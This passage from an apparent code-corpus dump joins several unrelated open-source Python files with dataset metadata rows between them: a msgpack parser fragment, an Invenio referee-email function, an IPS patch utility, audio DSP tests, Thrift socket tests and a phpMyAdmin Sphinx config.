(dyn.array(pint.uint8_t, 8), 'Value'),
]
@d_packet.define
class d_fixext16(summaryStructure):
type = 0b11011000
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 16), 'Value'),
]
@d_packet.define
class d_ext8(summaryStructure):
type = 0b11000111
_fields_ = [(pint.uint8_t, 'Value'), (pint.sint8_t, 'Type')]
@d_packet.define
class d_ext16(summaryStructure):
type = 0b11001000
_fields_ = [(pint.uint16_t, 'Value'), (pint.sint8_t, 'Type')]
@d_packet.define
class d_ext32(summaryStructure):
type = 0b11001001
_fields_ = [(pint.uint32_t, 'Value'), (pint.sint8_t, 'Type')]
if __name__ == '__main__':
import types
import operator,functools,itertools
res = [130,196,4,116,121,112,101,196,7,119,111,114,107,101,114,115, 196,4,100,97,116,97,145,130,196,8,119,111,114,107,101,114,105,100, 196,5,115,116,100,46,49,196,5,115,108,111,116,115,160]
res = str().join(map(chr,res))
# https://github.com/msgpack/msgpack-python/blob/master/test/test_format.py
#res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
_fixnum = res = b"\x92\x93\x00\x40\x7f\x93\xe0\xf0\xff"
_fixarray = res = b"\x92\x90\x91\x91\xc0"
_fixraw = res = b"\x94\xa0\xa1a\xa2bc\xa3def"
_fixmap = res = b"\x82\xc2\x81\xc0\xc0\xc3\x81\xc0\x80"
_unsignedint = res = b"\x99\xcc\x00\xcc\x80\xcc\xff\xcd\x00\x00\xcd\x80\x00" b"\xcd\xff\xff\xce\x00\x00\x00\x00\xce\x80\x00\x00\x00" b"\xce\xff\xff\xff\xff"
_signedint = res = b"\x99\xd0\x00\xd0\x80\xd0\xff\xd1\x00\x00\xd1\x80\x00" b"\xd1\xff\xff\xd2\x00\x00\x00\x00\xd2\x80\x00\x00\x00" b"\xd2\xff\xff\xff\xff"
_raw = res = b"\x96\xda\x00\x00\xda\x00\x01a\xda\x00\x02ab\xdb\x00\x00" b"\x00\x00\xdb\x00\x00\x00\x01a\xdb\x00\x00\x00\x02ab"
_array = res = b"\x96\xdc\x00\x00\xdc\x00\x01\xc0\xdc\x00\x02\xc2\xc3\xdd\x00" b"\x00\x00\x00\xdd\x00\x00\x00\x01\xc0\xdd\x00\x00\x00\x02" b"\xc2\xc3"
_map = res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
x = packet(source=ptypes.prov.string(res))
x=x.l
| bsd-2-clause | -6,107,569,118,676,119,000 | 30.808314 | 193 | 0.618819 | false |
lbjay/cds-invenio | modules/websubmit/lib/functions/Send_Request_For_Refereeing_Process.py | 1 | 4816 | ## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
## Description: function Send_Approval_Request
## This function sends an email to the referee asking him/her
## to approve/reject a document
## Author: T.Baron
## PARAMETERS: directory: parameter to the link manager program
## addressesDAM: address of the referee(s)
## categformatDAM: variable needed to extract the category
## of the document and use it to derive the
## address.
## authorfile: name of the file containing the author list
## titleFile: name of the file containing the title
import os
import re
from invenio.config import \
CFG_SITE_NAME, \
CFG_SITE_URL, \
CFG_SITE_SUPPORT_EMAIL
from invenio.access_control_admin import acc_get_role_users,acc_get_role_id
from invenio.websubmit_config import CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN
from invenio.mailutils import send_email
def Send_Request_For_Refereeing_Process(parameters, curdir, form, user_info=None):
global rn,sysno
# variables declaration
doctype = re.search(".*/([^/]*)/([^/]*)/[^/]*$",curdir).group(2)
FROMADDR = '%s Submission Engine <%s>' % (CFG_SITE_NAME,CFG_SITE_SUPPORT_EMAIL)
otheraddresses = parameters['addressesDAM']
categformat = parameters['categformatDAM']
# retrieve category
categformat = categformat.replace("<CATEG>","([^-]*)")
categs = re.match(categformat,rn)
if categs is not None:
category = categs.group(1)
else:
category = "unknown"
# create TI
if os.path.exists("%s/date" % curdir):
fp = open("%s/date" % curdir, "r")
date = fp.read()
fp.close()
else:
date = ""
if os.path.exists("%s/%s" % (curdir,parameters['titleFile'])):
fp = open("%s/%s" % (curdir,parameters['titleFile']),"r")
title = fp.read()
fp.close()
title = title.replace("\n","")
else:
title = ""
title += " - %s" % date
# create AU
if os.path.exists("%s/%s" % (curdir,parameters['authorfile'])):
fp = open("%s/%s" % (curdir,parameters['authorfile']), "r")
author = fp.read()
fp.close()
else:
author = ""
# we get the referee password
#sth = run_sql("SELECT access FROM sbmAPPROVAL WHERE rn=%s", (rn,))
#if len(sth) >0:
#access = sth[0][0]
# Build referee's email address
refereeaddress = ""
# Try to retrieve the publication committee chair's email from the role database
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_%s" % (doctype,category))):
refereeaddress += user[1] + ","
# And if there are general referees
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_*" % doctype)):
refereeaddress += user[1] + ","
refereeaddress = re.sub(",$","",refereeaddress)
# Creation of the mail for the referee
addresses = ""
if refereeaddress != "":
addresses = refereeaddress + ","
if otheraddresses != "":
addresses += otheraddresses
else:
addresses = re.sub(",$","",addresses)
title_referee = "Request for refereeing process of %s" % rn
mail_referee = "The document %s has been asked for refereing process to the %s Server..\nYour have to select an editorial board for it.\n\n" % (rn,CFG_SITE_NAME)
mail_referee +="Title: %s\n\nAuthor(s): %s\n\n" % (title,author)
mail_referee +="To access the document(s), select the file(s) from the location:<%s/record/%s/files/>\n\n" % (CFG_SITE_URL,sysno)
mail_referee +="To select an editorial board, you should go to this URL:\n<%s/publiline.py?doctype=%s&categ=%s&RN=%s>\n" % (CFG_SITE_URL,doctype,category,rn)
mail_referee +="---------------------------------------------\nBest regards.\nThe submission team.\n"
#Send mail to referee
send_email(FROMADDR, addresses, title_referee, mail_referee, copy_to_admin=CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN)
return ""
| gpl-2.0 | 4,204,461,003,099,882,000 | 44.433962 | 165 | 0.630606 | false |
theonlydude/RandomMetroidSolver | rom/ips.py | 1 | 10520 | import itertools
from utils.utils import range_union
# adapted from ips-util for python 3.2 (https://pypi.org/project/ips-util/)
class IPS_Patch(object):
def __init__(self, patchDict=None):
self.records = []
self.truncate_length = None
self.max_size = 0
if patchDict is not None:
for addr, data in patchDict.items():
byteData = bytearray(data)
self.add_record(addr, byteData)
def toDict(self):
ret = {}
for record in self.records:
if 'rle_count' in record:
ret[record['address']] = [int.from_bytes(record['data'],'little')]*record['rle_count']
else:
ret[record['address']] = [int(b) for b in record['data']]
return ret
@staticmethod
def load(filename):
loaded_patch = IPS_Patch()
with open(filename, 'rb') as file:
header = file.read(5)
if header != b'PATCH':
raise Exception('Not a valid IPS patch file!')
while True:
address_bytes = file.read(3)
if address_bytes == b'EOF':
break
address = int.from_bytes(address_bytes, byteorder='big')
length = int.from_bytes(file.read(2), byteorder='big')
rle_count = 0
if length == 0:
rle_count = int.from_bytes(file.read(2), byteorder='big')
length = 1
data = file.read(length)
if rle_count > 0:
loaded_patch.add_rle_record(address, data, rle_count)
else:
loaded_patch.add_record(address, data)
truncate_bytes = file.read(3)
if len(truncate_bytes) == 3:
loaded_patch.set_truncate_length(int.from_bytes(truncate_bytes, byteorder='big'))
return loaded_patch
@staticmethod
def create(original_data, patched_data):
# The heuristics for optimizing a patch were chosen with reference to
# the source code of Flips: https://github.com/Alcaro/Flips
patch = IPS_Patch()
run_in_progress = False
current_run_start = 0
current_run_data = bytearray()
runs = []
if len(original_data) > len(patched_data):
patch.set_truncate_length(len(patched_data))
original_data = original_data[:len(patched_data)]
elif len(original_data) < len(patched_data):
original_data += bytes([0] * (len(patched_data) - len(original_data)))
if original_data[-1] == 0 and patched_data[-1] == 0:
patch.add_record(len(patched_data) - 1, bytes([0]))
for index, (original, patched) in enumerate(zip(original_data, patched_data)):
if not run_in_progress:
if original != patched:
run_in_progress = True
current_run_start = index
current_run_data = bytearray([patched])
else:
if original == patched:
runs.append((current_run_start, current_run_data))
run_in_progress = False
else:
current_run_data.append(patched)
if run_in_progress:
runs.append((current_run_start, current_run_data))
for start, data in runs:
if start == int.from_bytes(b'EOF', byteorder='big'):
start -= 1
data = bytes([patched_data[start - 1]]) + data
grouped_byte_data = list([
{'val': key, 'count': sum(1 for _ in group), 'is_last': False}
for key,group in itertools.groupby(data)
])
grouped_byte_data[-1]['is_last'] = True
record_in_progress = bytearray()
pos = start
for group in grouped_byte_data:
if len(record_in_progress) > 0:
# We don't want to interrupt a record in progress with a new header unless
# this group is longer than two complete headers.
if group['count'] > 13:
patch.add_record(pos, record_in_progress)
pos += len(record_in_progress)
record_in_progress = bytearray()
patch.add_rle_record(pos, bytes([group['val']]), group['count'])
pos += group['count']
else:
record_in_progress += bytes([group['val']] * group['count'])
elif (group['count'] > 3 and group['is_last']) or group['count'] > 8:
# We benefit from making this an RLE record if the length is at least 8,
# or the length is at least 3 and we know it to be the last part of this diff.
# Make sure not to overflow the maximum length. Split it up if necessary.
remaining_length = group['count']
while remaining_length > 0xffff:
patch.add_rle_record(pos, bytes([group['val']]), 0xffff)
remaining_length -= 0xffff
pos += 0xffff
patch.add_rle_record(pos, bytes([group['val']]), remaining_length)
pos += remaining_length
else:
# Just begin a new standard record.
record_in_progress += bytes([group['val']] * group['count'])
if len(record_in_progress) > 0xffff:
patch.add_record(pos, record_in_progress[:0xffff])
record_in_progress = record_in_progress[0xffff:]
pos += 0xffff
# Finalize any record still in progress.
if len(record_in_progress) > 0:
patch.add_record(pos, record_in_progress)
return patch
def add_record(self, address, data):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if len(data) > 0xffff:
raise RuntimeError('Record with length {0} is too large for the IPS format. Records must be less than 65536 bytes.'.format(len(data)))
if len(data) == 0: # ignore empty records
return
record = {'address': address, 'data': data, 'size':len(data)}
self.appendRecord(record)
def add_rle_record(self, address, data, count):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if count > 0xffff:
raise RuntimeError('RLE record with length {0} is too large for the IPS format. RLE records must be less than 65536 bytes.'.format(count))
if len(data) != 1:
raise RuntimeError('Data for RLE record must be exactly one byte! Received {0}.'.format(data))
record = {'address': address, 'data': data, 'rle_count': count, 'size': count}
self.appendRecord(record)
def appendRecord(self, record):
sz = record['address'] + record['size']
if sz > self.max_size:
self.max_size = sz
self.records.append(record)
def set_truncate_length(self, truncate_length):
self.truncate_length = truncate_length
def encode(self):
encoded_bytes = bytearray()
encoded_bytes += 'PATCH'.encode('ascii')
for record in self.records:
encoded_bytes += record['address'].to_bytes(3, byteorder='big')
if 'rle_count' in record:
encoded_bytes += (0).to_bytes(2, byteorder='big')
encoded_bytes += record['rle_count'].to_bytes(2, byteorder='big')
else:
encoded_bytes += len(record['data']).to_bytes(2, byteorder='big')
encoded_bytes += record['data']
encoded_bytes += 'EOF'.encode('ascii')
if self.truncate_length is not None:
encoded_bytes += self.truncate_length.to_bytes(3, byteorder='big')
return encoded_bytes
# save patch into IPS file
def save(self, path):
with open(path, 'wb') as ipsFile:
ipsFile.write(self.encode())
# applies patch on an existing bytearray
def apply(self, in_data):
out_data = bytearray(in_data)
for record in self.records:
if record['address'] >= len(out_data):
out_data += bytes([0] * (record['address'] - len(out_data) + 1))
if 'rle_count' in record:
out_data[record['address'] : record['address'] + record['rle_count']] = b''.join([record['data']] * record['rle_count'])
else:
out_data[record['address'] : record['address'] + len(record['data'])] = record['data']
if self.truncate_length is not None:
out_data = out_data[:self.truncate_length]
return out_data
# applies patch on an opened file
def applyFile(self, handle):
for record in self.records:
handle.seek(record['address'])
if 'rle_count' in record:
handle.write(bytearray(b'').join([record['data']]) * record['rle_count'])
else:
handle.write(record['data'])
# appends an IPS_Patch on top of this one
def append(self, patch):
if patch.truncate_length is not None and (self.truncate_length is None or patch.truncate_length > self.truncate_length):
self.set_truncate_length(patch.truncate_length)
for record in patch.records:
if record['size'] > 0: # ignore empty records
self.appendRecord(record)
# gets address ranges written to by this patch
def getRanges(self):
def getRange(record):
return range(record['address'], record['address']+record['size'])
return range_union([getRange(record) for record in self.records])
| gpl-3.0 | 8,996,946,439,968,728,000 | 42.114754 | 164 | 0.552471 | false |
ojg/jack-qdsp | tests/runtest.py | 1 | 7336 | #!/usr/bin/env python
from numpy import *
import os as os
from scikits import audiolab
from scipy import signal
import sys
def writeaudio(data, filename='test_in.wav'):
audiolab.wavwrite(data, filename, 48000, 'float32')
def readaudio():
return audiolab.wavread("test_out.wav")[0]
def compareaudio(data1, data2, threshold=1e-7):
if (abs(data1 - data2) > threshold).any():
maxdev = amax(abs(data1 - data2))
print "Fail %f" % maxdev
print hstack([data1, data2])
quit()
else:
print "Pass"
def test_gain():
print "Testing dsp-gain"
#generate test input
ref = linspace(-1, 1, 200)
writeaudio(ref)
#create reference output
expected = ref*(10**(-1.0/20))
#run file-qdsp
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,g=-1")
#compare results
compareaudio(expected, readaudio())
expected = concatenate((zeros(48), ref[0:-48]))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,d=0.001")
compareaudio(expected, readaudio())
expected = concatenate((zeros(96), ref[0:-96]))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,d=0.002")
compareaudio(expected, readaudio())
expected = minimum(maximum(ref * -0.3, -(10**(-20.0/20))), (10**(-20.0/20)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,gl=-0.3,t=-20")
compareaudio(expected, readaudio())
def test_gate():
print "Testing dsp-gate"
ref = linspace(-0.25, 0.25, 200)
writeaudio(ref)
# test open gate
expected = ref # * array((zeros(50), ones(100), zeros(50))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-120")
compareaudio(expected, readaudio())
#test closing gate with zero hold
expected = ref * concatenate((ones(64), linspace(1,0,64), zeros(72)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6")
compareaudio(expected, readaudio(), 2e-7)
#test closing gate with hold
expected = ref * concatenate((ones(64), ones(64), linspace(1,0,64), zeros(8)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6,h=0.003")
compareaudio(expected, readaudio(), 2e-7)
#test closing and opening gate with zero hold
ref = linspace(-0.25, 1, 256)
writeaudio(ref)
expected = ref * concatenate((ones(64), linspace(1,0,64), zeros(64), linspace(0,1,64)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6")
compareaudio(expected, readaudio(), 2e-7)
#test closing and opening gate with hold
ref = linspace(-0.25, 1, 384)
writeaudio(ref)
expected = ref * concatenate((ones(64), ones(64), linspace(1,0,64), zeros(64), linspace(0,1,64), ones(64)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6,h=0.003")
compareaudio(expected, readaudio(), 2e-7)
def test_iir():
print "Testing dsp-iir"
ref = (2.0 * random.rand(512)) - 1.0
writeaudio(ref)
#test LP2 mono
b, a = signal.butter(2, 100.0/24000, 'low')
expected = signal.lfilter(b,a,ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p iir,lp2,f=100,q=0.7071")
compareaudio(expected, readaudio(), 1e-6)
#test HP2 with gain
b, a = signal.butter(2, 100.0/24000, 'high')
expected = signal.lfilter(b,a,ref*10**(-6.0/20))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p iir,hp2,f=100,q=0.7071,g=-6")
compareaudio(expected, readaudio(), 1e-6)
#test HP2 stereo
writeaudio(transpose([ref,-ref]))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p iir,hp2,f=100,q=0.7071,g=-6")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
def test_fir():
print "Testing dsp-fir"
#ref = ones(512)
ref = (2.0 * random.rand(512)) - 1.0
#test short mono fir
writeaudio(ref)
h = signal.firwin(21, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
writeaudio(expected, 'expected.wav')
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-6)
#test long mono fir
writeaudio(ref)
h = signal.firwin(312, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-6)
#test short stereo fir, mono coeffs
writeaudio(transpose([ref,-ref]))
h = signal.firwin(21, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
#test long stereo fir, mono coeffs
writeaudio(transpose([ref,-ref]))
h = signal.firwin(312, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
#test asymmetric mono fir
writeaudio(ref)
impulse = concatenate(([1], zeros(499)))
b, a = signal.butter(2, 500.0/24000, 'low')
h = signal.lfilter(b, a, impulse)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-6)
#test asymmetric stereo fir
writeaudio(transpose([ref,-ref]))
impulse = concatenate(([1], zeros(499)))
b, a = signal.butter(2, 500.0/24000, 'low')
h = signal.lfilter(b, a, impulse)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
os.remove('test_coeffs.txt')
def benchmarks():
print "Benchmarking"
ref = (2.0 * random.rand(131072)) - 1.0
h = signal.firwin(8191, 0.4)
expected = signal.lfilter(h, 1, ref)
savetxt("test_coeffs.txt", h)
#fir mono benchmark
writeaudio(ref)
os.system("../file-qdsp -n 256 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-5)
#fir stereo benchmark
writeaudio(transpose([ref,-ref]))
os.system("../file-qdsp -n 256 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-5)
os.remove('test_coeffs.txt')
#iir stereo benchmark
writeaudio(transpose([ref,-ref]))
b, a = signal.butter(2, 100.0/24000, 'high')
expected = signal.lfilter(b,a,ref*10**(-6.0/20))
os.system("../file-qdsp -n 256 -i test_in.wav -o test_out.wav -p iir,hp2,f=100,q=0.7071,g=-6")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-5)
def main():
if len(sys.argv) > 1 and sys.argv[1] == "bench":
benchmarks()
else:
test_gain()
test_gate()
test_iir()
test_fir()
os.remove('test_in.wav')
os.remove('test_out.wav')
if __name__ == "__main__":
main()
| gpl-3.0 | -4,635,497,234,165,862,000 | 32.345455 | 111 | 0.622819 | false |
facebook/fbthrift | thrift/lib/py/transport/TSocketTest.py | 1 | 5829 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import socket
import tempfile
import threading
import time
import unittest
import thrift.transport.TSocket as TSocket
import thrift.transport.TTransport as TTransport
class TSocketTest(unittest.TestCase):
def test_usage_as_context_manager(self):
"""
Asserts that both TSocket and TServerSocket can be used with `with` and
that their resources are disposed of at the close of the `with`.
"""
text = b"hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
self.assertFalse(conn.isOpen())
with server.accept() as client:
read = client.read(len(text))
self.assertFalse(conn.isOpen())
self.assertFalse(server.isListening())
self.assertEquals(read, text)
def test_server_context_errors(self):
# Make sure the TServerSocket context manager doesn't
# swallow exceptions
def do_test():
with TSocket.TServerSocket(port=0, family=socket.AF_INET6):
raise Exception('test_error')
self.assertRaisesRegexp(Exception, 'test_error', do_test)
def test_open_failure(self):
# Bind a server socket to an address, but don't actually listen on it.
server_socket = socket.socket(socket.AF_INET6)
try:
server_socket.bind(('::', 0))
server_port = server_socket.getsockname()[1]
# Explicitly use "localhost" as the hostname, so that the
# connect code will try both IPv6 and IPv4. We want to
# exercise the failure behavior when trying multiple addresses.
sock = TSocket.TSocket(host='localhost', port=server_port)
sock.setTimeout(50) # ms
try:
sock.open()
self.fail('unexpectedly succeeded to connect to closed socket')
except TTransport.TTransportException:
# sock.open() should not leave the file descriptor open
# when it fails
self.assertEquals(None, sock.handle)
self.assertEquals({}, sock.handles)
# Calling close() again on the socket should be a no-op,
# and shouldn't throw an error
sock.close()
finally:
server_socket.close()
def test_poller_process(self):
# Make sure that pollers do not fail when they're given None as timeout
text = "hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
def write_data():
# delay writing to verify that poller.process is waiting
time.sleep(1)
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
poller = TSocket.ConnectionSelect()
thread = threading.Thread(target=write_data)
thread.start()
for filenos in server.handles.keys():
poller.read(filenos)
r, _, x = poller.process(timeout=None)
thread.join()
# Verify that r is non-empty
self.assertTrue(r)
def test_deprecated_str_form_of_port(self):
# Make sure that the deprecated form of the `port` parameter is
# accepted in TServerSocket and TSocket.
port = "0"
text = b"hi" # sample text to send over the wire
# NB: unfortunately unittest.TestCase.assertWarns isn't available until
# py3.
with TSocket.TServerSocket(port=port, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=str(addr[1])) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
def test_bad_port(self):
port = 'bogus'
with self.assertRaises(ValueError):
with TSocket.TServerSocket(port=port):
pass
with self.assertRaises(ValueError):
with TSocket.TSocket(port=port):
pass
def test_unix_socket(self):
text = b"hi" # sample text to send over the wire
with tempfile.NamedTemporaryFile(delete=True) as fh:
unix_socket = fh.name
with TSocket.TServerSocket(unix_socket=unix_socket) as server:
with TSocket.TSocket(unix_socket=unix_socket) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
# The socket will not be cleaned up when the server has been shutdown.
self.assertTrue(os.path.exists(unix_socket))
| apache-2.0 | 3,627,083,272,699,399,700 | 38.924658 | 82 | 0.614857 | false |
hanoverhr/CAF | db/phpm/doc/conf.py | 1 | 9670 | # -*- coding: utf-8 -*-
#
# phpMyAdmin documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 26 14:04:48 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['configext']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'phpMyAdmin'
copyright = u'2012 - 2014, The phpMyAdmin devel team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '4.3.1'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'html', 'doctrees']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'phpMyAdmindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'phpMyAdmin.tex', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
